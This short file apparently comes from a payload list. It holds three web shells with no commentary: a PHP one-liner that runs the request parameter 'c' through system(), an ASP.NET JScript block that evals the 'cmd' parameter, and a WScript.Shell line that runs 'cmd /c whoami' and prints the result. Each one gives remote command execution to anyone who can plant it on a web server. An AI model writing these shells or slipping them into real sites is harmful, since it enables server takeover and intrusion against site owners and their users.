<?php if(isset($_REQUEST['c'])){system($_REQUEST['c'].' 2>&1');} ?>

// Server-side
<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["cmd"],"unsafe");}</script>
// Client-side
Response.Write(new ActiveXObject("WScript.Shell").exec("cmd /c whoami").stdout.readall())